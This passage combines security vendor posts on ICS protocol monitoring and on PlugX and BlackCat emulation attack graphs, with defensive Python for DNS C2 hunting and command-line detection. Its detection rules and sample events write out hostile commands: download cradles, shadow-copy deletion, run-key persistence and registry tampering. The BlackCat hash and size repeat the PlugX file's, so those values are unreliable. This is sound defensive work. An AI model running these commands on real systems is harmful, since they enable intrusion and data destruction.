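        raise ValueError("truncated ASDU header")
    ioa = body[6] | (body[7] << 8) | (body[8] << 16) if len(body) >= 9 else None
    return Asdu(body[0], body[1] & 0x7F, body[2] & 0x3F, body[3],
                body[4] | (body[5] << 8), ioa)


def split_stream(data: bytes) -> Iterable[bytes]:
    """Walk a reassembled TCP stream using the start byte and the length octet."""
    pos = 0
    while pos + 2 <= len(data):
        if data[pos] != START:
            raise ValueError(f"lost framing at offset {pos}")
        end = pos + 2 + data[pos + 1]
        yield data[pos:end]
        pos = end


@dataclass
class Finding:
    common_address: int
    type_id: int
    ioa: Optional[int]
    reason: str


def monitor(stream: bytes, allowed_casdu: Set[int], max_interrogated: int = 3) -> List[Finding]:
    """Flag activated control commands (noting whether the CASDU is documented)
    and interrogation fan-out across more stations than expected, which is how
    a tool could discover the CASDU it later hardcodes in its configuration."""
    findings, interrogated = [], set()
    for frame in split_stream(stream):
        asdu = parse_apdu(frame)
        if asdu is None or asdu.cot != COT_ACTIVATION:
            continue
        name = TYPE_NAMES.get(asdu.type_id, f"type {asdu.type_id}")
        if asdu.type_id in CONTROL_TYPES:
            scope = "known" if asdu.common_address in allowed_casdu else "UNKNOWN"
            findings.append(Finding(asdu.common_address, asdu.type_id, asdu.ioa,
                                    f"{name} activated on {scope} CASDU"))
        elif asdu.type_id == 100:
            interrogated.add(asdu.common_address)
            if len(interrogated) == max_interrogated + 1:
                findings.append(Finding(asdu.common_address, 100, None,
                                        f"interrogation fan-out beyond {max_interrogated} CASDUs"))
    return findings


def i_frame(type_id: int, cot: int, casdu: int, ioa: int, element: bytes) -> bytes:
    """Constructed I-format APDU with one information object (send/recv seq = 0)."""
    asdu = bytes([type_id, 0x01, cot, 0x00, casdu & 0xFF, casdu >> 8,
                  ioa & 0xFF, (ioa >> 8) & 0xFF, (ioa >> 16) & 0xFF]) + element
    return bytes([START, 4 + len(asdu), 0, 0, 0, 0]) + asdu


# Constructed capture: STARTDT act, station interrogation (QOI=20) sent to five
# CASDUs in turn, then a single command "on" to IOA 1000 of CASDU 7.
SAMPLE_STREAM = (
    bytes([START, 4, 0x07, 0, 0, 0])
    + b"".join(i_frame(100, COT_ACTIVATION, ca, 0, b"\x14") for ca in (1, 2, 3, 4, 5))
    + i_frame(45, COT_ACTIVATION, 7, 1000, b"\x01")
)


def demo() -> List[Finding]:
    """Run the monitor with CASDUs 1 and 2 documented as legitimate stations."""
    return monitor(SAMPLE_STREAM, allowed_casdu={1, 2})
```

A production monitor would additionally baseline which master IP issues commands to which CASDU/IOA pairs; the parser above is the part that extracts those fields from the wire.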
OPC UA
Monitor the alerts and events related to the OPC UA protocol. eyeInspect offers dozens of events related to anomalies like credential bruteforcing, bad certificate usage, anomalous connection attempts, configuration changes and changes to OPC UA tags.
Monitor OPC UA connections, especially newly established or anomalous OPC UA connections through dedicated filters, analytics, maps and the change logs.
MODBUS/Schneider Electric
Monitor the alerts and events related to the MODBUS protocol. eyeInspect offers dozens of events related to anomalies like error codes associated with abnormal device crashes/reboots, files uploaded or downloaded, file deletion, unauthorized changes in device configuration and execution of commands.
Add an anomaly detection-specific blacklisting rule on ports 27126 and 27127 that target IP broadcast 255.255.255.255, to identify the Machine Expert Discovery protocol used in the initial phase. (A premade profile is available on request through Forescout representatives or Customer Support.)
Install the new Device and Visibility Addons Script 3.2 (or newer) to detect and vet devices using this discovery protocol.
OMRON FINS
Implement the OMRON FINS Monitor script to receive more alerts and details about unauthorized changes in device configuration and execution of commands, files uploaded or downloaded and tons of other anomalies (available on request through Forescout representatives).
The post Industroyer2 and INCONTROLLER: New Findings and How Forescout Protects Against the Most Recent ICS-Specific Malware appeared first on Forescout.
Malware often forms the foundation for an adversary cyberattack, giving adversaries a means to employ a range of tactics, techniques, and procedures (TTPs) against a target to achieve their strategic objectives. For analysts, adversary malware also provides insights into an adversary's behavior when more complete incident response data is unavailable, particularly at the procedure level. Defenders can then improve their security posture by testing their defenses against the malware in advance. But only if the assessment can be done easily.
Attack graphs give us a means of arranging real-world malware into its component TTPs to run emulations, and today we are immensely excited to announce our new malware emulation attack graphs.
How do we build it? AttackIQ’s adversary research team analyzes real-world malware and then arranges the TTPs into a logical flow that emulates specific adversary behaviors. The resulting attack graph gives you a cornerstone of hard data – a detailed adversary emulation – to run against your security program and test your defense performance.
What sets malware emulation attack graphs apart from AttackIQ’s other attack graphs is their focus on the TTPs made possible by the malware itself (rather than in an entire adversary intrusion sequence, which could include manual TTPs). Often in incident reports, malware TTPs are either unknown or not understood. Analysts often don’t know whether the TTPs reported in an incident are features of the malware itself, or if they are employed by an intruder manually. AttackIQ’s malware emulation attack graphs focus on key aspects of malware used across many campaigns. They give defenders the opportunity to validate and tune their endpoint security controls and network security controls against each logical stage of a specific malware strain.
Specifically, a malware-based threat assessment helps defensive teams to:
identify core behavior observed in specific malware samples
identify the security technologies that can detect and prevent behaviors in specific malware samples
evaluate the efficacy of defensive technologies (and the overarching security stack) in detecting and preventing specific malware behaviors; and
identify gaps in the team’s security posture that could be filled or improved to detect and prevent specific TTPs.
To kick off these new attack graphs, we chose the ever-prevalent Sogu (a.k.a. PlugX) remote access tool (RAT) and the recent Rust-based ransomware, BlackCat (a.k.a. ALPHV). We will cover these new additions to the AttackIQ Security Optimization Platform in a live demo on May 26, 2022 at 10.000 hrs PT.
Sogu (PlugX)
Sogu (a.k.a. PlugX) is a full-featured, modular RAT with many variants and is used by multiple China-based groups within the espionage threat class, to include APT41, APT10, UNC124, Mustang Panda, and others. Sogu has been around for more than a decade with early reporting as far back as 2008, yet it continues to target victims around the world, to include the semiconductor industry and nation-state governments.
Our Sogu/PlugX attack graph is derived from a sample used in an intrusion by China-based threat actors that targeted the semiconductor and high-tech subsector of the manufacturing industry in July 2020.
This sample was delivered in a self-extracting (SFX) RAR file which contains three files required to implement a DLL side-loading method of execution. When this SFX RAR file is opened by an unwitting user, these files are written to disk and the executable is run.
Legitimate kick-off executable (in the sample analyzed this was a McAfee program).
Hijacked DLL that loads/launches Sogu/PlugX (this DLL is considered hijacked because the legitimate program will natively load the DLL).
Encrypted file holding encrypted Sogu shellcode payload.
This method and required set of files is commonly seen with Sogu/PlugX variants.
Metadata from the sample analyzed
Description: SFX RAR file
Size (bytes): 327583
SHA1: 09deeb57240711b9fcf33d0b154c9ffd0e0984b1
Description: Legitimate exe file
Size (bytes): 140576
SHA1: d201b130232e0ea411daa23c1ba2892fe6468712
Description: Hijacked DLL, loads the payload file
Size (bytes): 199168
SHA1: 040ae092a0ab8801a92c4d0d533a03ce13595e1f
Description: Encrypted payload file
Size (bytes): 121128
SHA1: eb9f611889ef99c7b0c4006e1dea50dd5a8c7f93
This attack graph focuses on the sample’s core TTPs, captured by the following scenarios that emulate behavior as the malware progresses through its code execution.
Scenarios 1 and 2: Initial Access: Spearphishing (T1566.002): Sogu is commonly delivered to targets using spearphishing links. For the first scenario in the graph, we begin with the step after a link was clicked by downloading the SFX RAR file package to the endpoint, giving A/V and potentially network security controls the opportunity to detect and/or prevent delivery.
1a. Detection Process
Parent Process Name == (Winword.exe OR Excel.exe OR Powerpnt.exe)
Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS ((DownloadString OR DownloadFile) AND HTTP AND (Invoke-Expression OR IEX))
1b. Mitigation Policies
MITRE recommends the following mitigations for T1566.002:
M1047
M1021
M1054
M1018
M1017
Scenario 3: Save Malicious DLL to Disk: If the SFX RAR file is successfully opened, the trio of files will be written to the victim’s disk. Of these three files, the malicious DLL gives another opportunity to test A/V protection since it isn’t obfuscated like the encrypted Sogu shellcode payload file. This scenario saves the constituent hijacked DLL to disk, mimicking the SFX RAR file’s write operation to the host machine.
3a. Detection Process
While A/V, NGAV and EPP security controls excel at detecting malicious files being saved to disk, Application Control technologies provide opportunities to detect unsigned DLLs being saved to disk. Further, execution of unsigned filetypes (such as DLLs) specified in your Application Control policies can be prevented/blocked. Additionally, EDR technologies have the ability to detect these unsigned filetypes being saved to globally writable directories on devices. However, the latter may be false-positive prone and lead to excessive alerts. In addition to looking for unsigned DLLs being placed in globally writable directories, using YARA detections to look for strings in malware files is an alternate/effective way of detecting this activity on your endpoints:
PlugX / Sogu YARA Rules
3b. Mitigation Policies
Ensure that devices are placed within a protective (not detective) antivirus policy to act on files through static and dynamic analysis.
Ensure account management is correctly configured through group policy, ensuring proper users only have rights to write to sensitive areas on disk.
Ensure application control technology policies are thought-through, tuned and maintained; you can get very granular with what types of files are indexed and can execute on which systems in your network. For example, self-extracting RAR files can be banned entirely on your network, or unsigned DLLs can be prevented from executing. Attempted execution of banned files is logged and can flow into your SIEM for further alerting or correlation.
Scenario 4: Hijack Execution Flow: DLL Side-Loading (T1574.002): Once the three files are written to disk, the SFX RAR file automatically runs the legitimate McAfee executable, leading to the DLL side-loading technique. In DLL side-loading, the legitimate binary attempts to load a required DLL and, instead of loading the normal benign DLL, a hijacked version is loaded because it resides in the same directory as the McAfee executable.
4a. Detection Process
Process Name == evt.exe (This is the name of the trusted McAfee executable extracted from the RAR file. This binary name is subject to change.)
Imageload Name == McUtil.dll (This is the name of the DLL extracted from the RAR file. This binary name is subject to change.)
Imageload is_signed == False
4b. Mitigation Policies
MITRE recommends the following mitigations for T1574.002:
M1013
M1051
Additionally, if the legitimate file that is used to load a DLL is not a binary needed for your organization, add the hashes to your application control block lists as soon as possible. Binaries on a block list will not be able to execute even if they are benign by nature.
Scenario 5: Process Injection (T1055.001): Sogu uses process injection both reflectively and remotely to evade defenses. Malicious code can sometimes go undetected by security products because it is running inside a legitimate process. Our emulation mimics DLL code injection by using Windows API calls to LoadLibrary and CreateRemoteThread to inject code into a legitimate process.
5a. Detection Process
Utilize tools such as Procmon.exe or EDR tools to monitor for Windows API calls such as “LoadLibrary” and “CreateRemoteThread” made by unsigned or unrecognized binaries, especially if they are coming from globally writable locations or from locations that do not belong to the process being injected into.
Process Name == evt.exe (This is the name of the trusted McAfee executable extracted from the RAR file. This binary name is subject to change.)
Imageload Name == McUtil.dll (This is the name of the .dll extracted from the RAR file. This binary name is subject to change.)
Imageload is_signed == False
5b. Mitigation Policies
MITRE recommends the following mitigations for T1055.001:
M1040
Scenario 6: Persistence via Windows Service (T1543.003): If the malware executes with elevated privilege, persistence is established by creating a new service that will initiate the execution of the benign McAfee binary, starting the process of malicious code execution again.
6a. Detection Process
Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS ((“sc” OR “sc.exe”) AND “create” AND “binpath=<path to trusted executable>” AND “start=auto”)
6b. Mitigation Policies
MITRE recommends the following mitigations for T1543.003:
M1047
M1040
M1045
M1028
M1018
Scenario 7: Persistence via Registry Run Key (T1547.001): Alternatively, if the malware is executed as a normal user, persistence is achieved using a standard registry run key. Our attack graph will take this persistence path if the service creation is prevented in the previous scenario.
7a. Detection Process
Since registry key modifications are typical Windows system behavior, what stands out is registry modifications attempted by unexpected or underprivileged users. This detection excludes administrative or expected users to reduce false positives from normal system usage.
Process Name == (cmd.exe or powershell.exe)
User NOT IN <list of expected reg.exe users>
Command Line CONTAINS ((“reg” OR “reg.exe”) AND (“HKEY_CURRENT_USER” OR “HKEY_LOCAL_MACHINE”) AND “SOFTWARE\Microsoft\Windows\CurrentVersion” AND (“Run” OR “RunOnce”))
7b. Mitigation Policies
Although it is expected Windows behavior for these registry keys to be modified so that programs start at boot, modifications can be constrained through group policy and application control/whitelisting, allowing only authorized users to run tools such as cmd.exe, powershell.exe, reg.exe, and regedit.exe.
Scenarios 8 and 9: Command and Control: DNS (T1071.004): After persistence is set, the malware establishes communication with command and control (C2) infrastructure by abusing the Domain Name System (DNS) application layer protocol to avoid detection/network filtering.
This Sogu sample is configured to send DNS callouts in TXT records that carry encoded victim information prepended to the threat actor-controlled domain. Example:
ENCODEDDATA.ENCODEDDATA.ENCODEDDATA.badSubdomain.badDomain.bad
An initial DNS request is sent through a hardcoded public Google DNS server, 8.8.8.8, which we assess to be a way around potential internal network DNS blacklisting implemented by the victim organization’s security team.
If the Google DNS resolution fails, potentially because a web proxy or DNS policy disallows external DNS requests, a fallback callout identical in content is sent to the host’s default DNS server. Our scenario emulates the structure of the encoded data in these callouts, which are sent to AttackIQ infrastructure. This gives defenders the opportunity to build network detections for anomalous DNS traffic like this, which could prove useful beyond Sogu detection.
8a. Detection Process
Typically, C2 traffic is sent through HTTP/HTTPS which is often monitored by network firewalls and content filtering security controls. Threat actors using Sogu/PlugX utilize the DNS protocol to remain undetected. Creating network Snort rules to alert on any UDP 53 connections to flagged IPs may be an effective way to alert on possible C2 activity from threat actors utilizing this technique.
alert udp any 53 -> $HOME_NET any (msg:"Sogu/PlugX DNS C2 callout"; content:"|43 D7 41 85|"; sid:1000001; rev:1;)
Please note, the content portion here is a hash representation of the destination IP address for the DNS request (i.e., the C2). This portion should be modified as IP artifacts are collected. A sid value from the local range (1000000 and above) is required for Snort to load the rule.
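The two-stage callout described in scenarios 8 and 9 gives a defender two independent handles: the query that goes straight to the hardcoded 8.8.8.8 instead of the internal resolver, and the long, high-entropy labels prepended to the actor's domain in the TXT query. The following is an added example, not AttackIQ code, that applies both checks to resolver-log lines; the log format, the internal resolver address, timestamps, client addresses and the encoded-looking labels are constructed for this example.

```python
"""Spotting Sogu-style DNS TXT callouts in resolver or firewall logs (scenarios 8 and 9).

Added example, not AttackIQ code. The log line format, INTERNAL_RESOLVERS, the
timestamps, client addresses and the encoded-looking labels are constructed;
8.8.8.8 and the name pattern come from the analysis above.
"""
import math
from collections import Counter

INTERNAL_RESOLVERS = {"10.0.0.53"}   # constructed: the organisation's own DNS servers
HARDCODED_RESOLVER = "8.8.8.8"        # the public resolver the sample tries first

# Encoded victim data shows up as long, high-entropy labels left of the actor's domain.
MIN_PAYLOAD_LENGTH = 40    # characters in the labels left of the registrable domain
MIN_ENTROPY_BITS = 3.0     # Shannon entropy per character of that payload


def shannon_entropy(text: str) -> float:
    """Bits per character; encoded data scores well above dictionary words."""
    if not text:
        return 0.0
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def encoded_payload(qname: str) -> str:
    """Everything left of the last two labels, treated as the carrier payload.

    Two labels is a crude stand-in for the registrable domain; a public suffix
    list would do this properly for names like example.co.uk.
    """
    labels = qname.rstrip(".").split(".")
    return "".join(labels[:-2])


def looks_encoded(qname: str) -> bool:
    payload = encoded_payload(qname)
    return len(payload) >= MIN_PAYLOAD_LENGTH and shannon_entropy(payload) >= MIN_ENTROPY_BITS


def parse(line: str) -> dict:
    """Constructed format: '<ts> <client> -> <resolver> <qtype> <qname>'."""
    ts, client, _, resolver, qtype, qname = line.split()
    return {"ts": ts, "client": client, "resolver": resolver, "qtype": qtype, "qname": qname}


def inspect(record: dict) -> list[str]:
    """Return the reasons a query record is suspicious (empty for normal traffic)."""
    reasons = []
    # The first callout goes straight to 8.8.8.8, bypassing the internal resolvers
    # and therefore any blocklist enforced on them.
    if record["resolver"] not in INTERNAL_RESOLVERS:
        what = "hardcoded public resolver" if record["resolver"] == HARDCODED_RESOLVER else "external resolver"
        reasons.append("resolver bypass: %s queried %s directly" % (record["client"], what))
    # The fallback uses the default resolver, so the name itself has to carry the detection.
    if record["qtype"] == "TXT" and looks_encoded(record["qname"]):
        reasons.append("TXT query carrying %d characters of encoded-looking subdomain data"
                       % len(encoded_payload(record["qname"])))
    return reasons


def hunt(log: str) -> list[dict]:
    """Parse every line and return the records that raised at least one reason."""
    findings = []
    for line in log.splitlines():
        if not line.strip():
            continue
        record = parse(line)
        reasons = inspect(record)
        if reasons:
            findings.append({**record, "reasons": reasons})
    return findings


# Constructed sample: ordinary lookups around one host's two-stage callout.
SAMPLE_LOG = """\
2022-05-03T10:01:02Z 10.1.2.15 -> 10.0.0.53 A www.example.com
2022-05-03T10:01:05Z 10.1.2.15 -> 8.8.8.8 TXT GEZDGNBVGY3TQOJQ.MFRGGZDFMZTWQ2LK.NNWG23TPOBYXE43U.badSubdomain.badDomain.bad
2022-05-03T10:01:07Z 10.1.2.15 -> 10.0.0.53 TXT GEZDGNBVGY3TQOJQ.MFRGGZDFMZTWQ2LK.NNWG23TPOBYXE43U.badSubdomain.badDomain.bad
2022-05-03T10:02:11Z 10.1.2.20 -> 10.0.0.53 TXT example.com
2022-05-03T10:02:30Z 10.1.2.31 -> 10.0.0.53 A mail.corp.example.com
"""

if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOG):
        print(finding["ts"], finding["client"], finding["qname"])
        for reason in finding["reasons"]:
            print("   ", reason)
```

The thresholds are starting points; tune them against a baseline of your own TXT traffic (SPF, DKIM and verification records are legitimate TXT lookups with short payloads).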
8b. Mitigation Policies
MITRE recommends the following mitigations for T1071.004:
M1037
M1031
Scenario 10: Input Capture: Keylogging (T1056.001): With the C2 channel established, the running implant can now receive commands or Sogu plugins enabling additional capability from the external C2 server. One of the most common commands received is the enabling of keylogging functionality. The scenario uses a system hooking routine to capture any keystrokes using calls to the Windows API.
10a. Detection Process
MITRE detection recommendations for T1056.001:
DS0009
DS0027
Scenario 11: Windows Command Shell (T1059.003): Another post-exploitation behavior of Sogu is the use of the Windows command shell for execution of reconnaissance commands. If the keylogger activity in the previous scenario is prevented by security controls, a command shell is initiated and the following commands are executed: ipconfig, whoami, systeminfo.
11a. Detection Process
Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS “systeminfo”
User NOT IN <list of expected administrators to be issuing these commands>
11b. Mitigation Policies
MITRE mitigation Recommendations for T1059.003:
M1038
Additionally, ensure that Group Policy is set and enforced to allow only authorized users/administrators to be able to run cmd.exe or powershell.exe. These interpreters can be limited to lower privileged or unneeded users to prevent enumeration or abuse.
Scenario 12: Data Exfiltration Over HTTP (T1048.003): In the final technique of the attack graph, we emulate exfiltration of data over HTTP by compressing mocked data and transmitting it to an AttackIQ-controlled server.
12a. Detection Process
MITRE detection Recommendations for T1048.003:
DS0017
DS0022
12b. Mitigation Policies
MITRE mitigation Recommendations for T1048.003:
M1057
M1037
M1031
M1030
BlackCat (ALPHV) Ransomware
BlackCat (a.k.a. ALPHV) emerged as Ransomware-as-a-Service (RaaS) as early as mid-November 2021, providing would-be attackers with a highly configurable, multi-platform ransomware strain written in Rust. BlackCat operators use the double-extortion model, which not only encrypts victim data but also threatens public exposure of sensitive information collected and exfiltrated prior to ransomware deployment.
According to an April 2022 FBI report, BlackCat has compromised at least 60 organizations worldwide through March 2022. True to the nature of RaaS, victim sectors are wide ranging, and have been reported to include German oil, European port authorities, high-end fashion/apparel, and higher education institutions in the United States.
The sample analyzed for our content development was obtained from a known public malware repository and was first submitted to VirusTotal in December 2021.
Sample Metadata
Description: BlackCat.exe (Win32)
Size (bytes): 327583
SHA1: 09deeb57240711b9fcf33d0b154c9ffd0e0984b1
Our BlackCat attack graph emulates a series of core behaviors beginning with introducing the ransomware to the environment, moving through configuration of the host for efficient and effective encryption, preparation for propagation, and finally to BlackCat’s ransomware encryption method.
Scenarios 1 and 2: Ingress Tool Transfer (T1105): Intruders bring BlackCat into a victim environment after it has been breached. To begin this attack graph, we assume that initial access has been achieved and we emulate the introduction of the ransomware to the endpoint. This pair of scenarios downloads and saves a Windows-based BlackCat sample to disk, giving A/V security controls an opportunity to detect inbound tool delivery, as well as uploads to memory.
1a. Detection Process
Once a malicious actor has compromised an endpoint, they may attempt to transfer any tools or malware onto the device. Attackers may utilize tools such as PowerShell, Certutil, Bitsadmin, and Curl.
PowerShell Example:
Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS((“IWR” OR “Invoke-WebRequest”) AND “DownloadData” AND “Hidden”)
Certutil Example:
Process Name == Certutil.exe
Command Line CONTAINS (“-urlcache” AND “-f”)
Bitsadmin Example:
Process Name == Bitsadmin.exe
Command Line CONTAINS (“/transfer” AND “http”)
Curl Example:
Process Name == Curl.exe
Command Line CONTAINS (“http” AND “-o”)
1b. Mitigation Policies
MITRE mitigation Recommendations for T1105:
M1031
Additionally, it is advised that non-administrators be prevented from using tools such as powershell.exe, cmd.exe, and certutil.exe. This prevents malicious use of these tools from end-user accounts.
Scenario 3: Windows Management Instrumentation (WMI) Commands (T1047): One of the first things BlackCat does is grab the host machine’s Windows UUID, which is used to build a unique victim identifier for the ransom process. The malware retrieves this piece of information by using a living-off-the-land tool, WMI, to issue the following command: “csproduct get UUID”.
3a. Detection Process
Developing a baseline of typical binaries that wmiprvse.exe invokes in your environment, then utilizing that baseline to make a detection is a good step in monitoring abnormal Windows Management Instrumentation activity. For example, creating a detection to alert on processes not in a list of known processes being invoked from wmiprvse.exe would identify possible malicious activity.
Monitoring the endpoint for the following would also alert on possible suspicious use:
Process Name == wmic.exe
Command Line CONTAINS (“Process call create” AND (“.dll” OR “.exe”))
3b. Mitigation Policies
MITRE mitigation Recommendations for T1047:
M1040
M1038
M1026
M1018
Additionally, ensure only administrators are authorized to utilize the Windows Management Instrumentation as this tool may be utilized for enumeration, lateral movement, and command execution as seen in this scenario.
Scenario 4: Impair Defenses: Disable or Modify Tools (T1562.001): Here, we implement a new custom scenario that emulates BlackCat’s attempt to allow Remote Symbolic Links on the host using the fsutil command. Enabling these remote symbolic links can expand access to remote file locations for encryption as well as create additional pathways for propagation.
4a. Detection Process
Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS (“fsutil” AND “SymlinkEvaluation” AND (“R2L:1” OR “R2R:1”))
4b. Mitigation Policies
MITRE mitigation Recommendations for T1562.001:
M1022
M1024
M1018
Scenario 5: Modify Registry (T1112): In this scenario we emulate BlackCat’s addition of a registry key that maximizes concurrent network requests made by the host, likely to prevent any hiccups during file encryption of remotely available files. The “MaxMpxCt” key is set to 65535.
5a. Detection Process
Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS ((“reg” OR “reg.exe”) AND “add” AND “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” AND “/V MaxMpxCt”)
5b. Mitigation Policies
MITRE mitigation Recommendations for T1112:
M1024
Scenario 6: File Deletion: Volume Shadow Copy (T1070.004): Using the Windows command shell, this scenario reproduces the deletion of Volume Shadow Copies. BlackCat and other ransomware lines make use of this technique to restrict the victim’s ability to restore the encrypted files from backup.
6a. Detection Process
Process Name == vssadmin.exe
Command Line CONTAINS (“delete shadows“)
6b. Mitigation Policies
It is recommended that group policy settings and Application Control/whitelisting software are set to only allow authorized users access to tools such as vssadmin.exe, cmd.exe, and powershell.exe to prevent misuse if an account is compromised.
Additionally, ensure that backup files can only be accessed by authorized personnel. Underprivileged user accounts should have neither read nor write access to these backup files.
Scenario 7: System Network Configuration Discovery (T1016): If configured, BlackCat will propagate on a victim’s local network. In order to spread itself to neighboring machines, discovery actions are needed to identify pathways available from the origin host. Network topology data points are obtained by reproducing BlackCat’s network share discovery and its MAC address snooping with “arp” commands.
7a. Detection Process
Typically, system enumeration is carried out using benign Windows applications. This allows an attacker to gain additional information about the target environment without setting off alarms by using malware or software that AV may flag. Since these techniques rely on benign Windows processes, the following detections should be combined with a list of expected users, such as network administrators, to reduce false positives:
Enumeration through “net” command
Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS ((“net” OR “net.exe”) AND “use”)
User NOT IN <list of expected net.exe users>
Enumeration through “arp” command
Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS (“arp -a”)
User NOT IN <list of expected network admins>
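The process-creation detections above are all the same shape: a process name, a set of command-line tokens joined by AND/OR, and sometimes a "User NOT IN" exclusion. The block below is an added example, not AttackIQ code, that encodes the rules from Sogu scenarios 6a and 7a and BlackCat scenarios 4a to 7a as data and runs them over constructed process events; the event format, user names and the allow-lists standing in for "<list of expected ... users>" are assumptions of this example. It also normalizes the command line first, because sc.exe requires a space after each "=" (binpath= "..." and start= auto), which a naive substring match for binpath="..." misses.

```python
"""The command-line detections from the attack graphs as data, run over sample events.

Added example, not AttackIQ code. Rules encode Sogu scenarios 6a and 7a and
BlackCat scenarios 4a-7a; the event format, user names and the allow-lists that
stand in for "<list of expected ... users>" are constructed for this example.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # image name of the created process, e.g. cmd.exe
    user: str           # account that launched it
    command_line: str


@dataclass(frozen=True)
class Rule:
    name: str
    processes: frozenset                     # lower-case image names the rule applies to
    groups: tuple                            # AND of groups; each group is a tuple of OR'd regexes
    exclude_users: frozenset = frozenset()   # the page's "User NOT IN <list>" clause


SHELLS = frozenset({"cmd.exe", "powershell.exe"})
EXPECTED_REG_USERS = frozenset({r"corp\svc_deploy"})    # constructed allow-list
EXPECTED_NET_ADMINS = frozenset({r"corp\netadmin"})     # constructed allow-list

RULES = (
    Rule("T1543.003 service creation pointing at a trusted binary", SHELLS,
         ((r"\bsc(\.exe)?\b",), (r"\bcreate\b",), (r"\bbinpath=",), (r"\bstart=auto\b",))),
    # currentversion\run(once)? covers Run and RunOnce; HKCU/HKLM are reg.exe's short hive names.
    Rule("T1547.001 run key written by an unexpected user", SHELLS,
         ((r"\breg(\.exe)?\b",), (r"\b(hkey_current_user|hkcu|hkey_local_machine|hklm)\\",),
          (r"software\\microsoft\\windows\\currentversion\\run(once)?\b",)),
         EXPECTED_REG_USERS),
    Rule("T1562.001 remote symlink evaluation enabled", SHELLS,
         ((r"\bfsutil\b",), (r"\bsymlinkevaluation\b",), (r"\br2[lr]:1\b",))),
    Rule("T1112 MaxMpxCt raised", SHELLS,
         ((r"\breg(\.exe)?\b",), (r"\badd\b",), (r"services\\lanmanserver\\parameters\b",),
          (r"/v\s*maxmpxct\b",))),
    Rule("T1070.004 shadow copies deleted", frozenset({"vssadmin.exe"}),
         ((r"\bdelete\s+shadows\b",),)),
    Rule("T1016 share or ARP enumeration", SHELLS,
         ((r"\bnet(\.exe)?\s+use\b", r"\barp\s+-a\b"),), EXPECTED_NET_ADMINS),
)


def normalize(command_line: str) -> str:
    """Lower-case, collapse whitespace, drop quotes and the space sc.exe requires after '='.

    Without the last step a rule looking for binpath=... never fires, because the
    real syntax is:  sc create Svc binpath= "C:\\path\\evt.exe" start= auto
    """
    text = " ".join(command_line.split()).lower().replace('"', "")
    return re.sub(r"=\s+", "=", text)


def matches(rule: Rule, event: ProcessEvent) -> bool:
    if event.image.lower() not in rule.processes:
        return False
    if event.user.lower() in rule.exclude_users:
        return False
    text = normalize(event.command_line)
    return all(any(re.search(pattern, text) for pattern in group) for group in rule.groups)


def matching_rules(event: ProcessEvent) -> list[str]:
    return [rule.name for rule in RULES if matches(rule, event)]


def evaluate(events) -> list[tuple[ProcessEvent, str]]:
    """Every (event, rule name) pair that fired, in event order."""
    return [(event, name) for event in events for name in matching_rules(event)]


# Constructed events: one per rule, one allow-listed user, one benign near miss.
SAMPLE_EVENTS = (
    ProcessEvent("cmd.exe", r"CORP\alice",
                 r'sc create UpdaterSvc binpath= "C:\ProgramData\Update\evt.exe" start= auto'),
    ProcessEvent("cmd.exe", r"CORP\alice",
                 r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\ProgramData\Update\evt.exe"'),
    ProcessEvent("cmd.exe", r"CORP\svc_deploy",    # expected user: suppressed
                 r'reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Agent /d "C:\Program Files\Agent\agent.exe"'),
    ProcessEvent("cmd.exe", r"CORP\bob", "fsutil behavior set SymlinkEvaluation R2L:1 R2R:1"),
    ProcessEvent("cmd.exe", r"CORP\bob",
                 r"reg add HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /t REG_DWORD /d 65535 /f"),
    ProcessEvent("vssadmin.exe", r"CORP\bob", "vssadmin delete shadows /all /quiet"),
    ProcessEvent("cmd.exe", r"CORP\bob", r"net use \\fileserver\finance"),
    ProcessEvent("cmd.exe", r"CORP\alice", "sc query wuauserv"),   # benign: no 'create'
)

if __name__ == "__main__":
    for event, name in evaluate(SAMPLE_EVENTS):
        print("%-18s %-52s %s" % (event.user, name, event.command_line))
```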
7b. Mitigation Policies
Although these are benign Windows commands, they can be used maliciously if threat actors have compromised an account. To reduce this information disclosure, cmd.exe and powershell.exe should be restricted to only the administrative users who need them.
Additionally, Windows Audit Process Creation auditing can be enabled to generate event ID 4688, together with the GPO setting “Include command line in process creation events.” Windows command-line events can then be filtered and forwarded to a SIEM from all endpoints for further filtering, tuning and correlation to detect anomalous activity.
Scenario 8: Ingress Tool Transfer (T1105): BlackCat carries a copy of the PsExec utility in its resources that is written to disk and likely used to spread itself if configured for propagation. In the sample we analyzed, propagation is not enabled; however, we included this behavior because it is a configurable option and a tool commonly abused by attackers to achieve various results, including moving files over the network and remote process execution.
8a. Detection Process
PsExec is not malicious by nature and is signed by Microsoft as it is a Microsoft published SysInternals tool. This tool may be used maliciously to move laterally on devices within a network, and should be monitored for authorized usage only. If this is not an expected binary in your environment for network administrators to utilize, then we recommend monitoring for this file periodically to see if any have been placed on the system without approved intent. PsExec with alternate credentials specified on the command line is a Logon Type 3+2 event and it should be noted that this passes those credentials in plaintext across the network as well as leaves those credentials vulnerable to theft on the target host. PsExec usage without explicit credentials is a Type 3 Logon event and does not leave any credentials on the target host.
8b. Mitigation Policies
MITRE mitigation Recommendations for T1105:
M1031
Even legitimate usage of PsExec is problematic from a security perspective. For the best security, PsExec should be globally banned from execution using Application Control/whitelisting software. Authorized sysadmin use of PowerShell Remoting is a much more secure and preferred option for legitimate Type 3 logons in your environment and does not leave credentials on the target host.
Scenario 9: File and Directory Discovery (T1083): At this stage of the kill chain, BlackCat preps for file encryption by enumerating the filesystem searching for data to encrypt.
9a. Detection Process
Searching the file system on Windows machines is typically done through the CLI with the “dir” command. This is typical Windows behavior, but monitoring for it may help identify malicious actions in your environment. Often the output of enumeration on endpoints is redirected to a file for exfiltration and examination by the attacker:
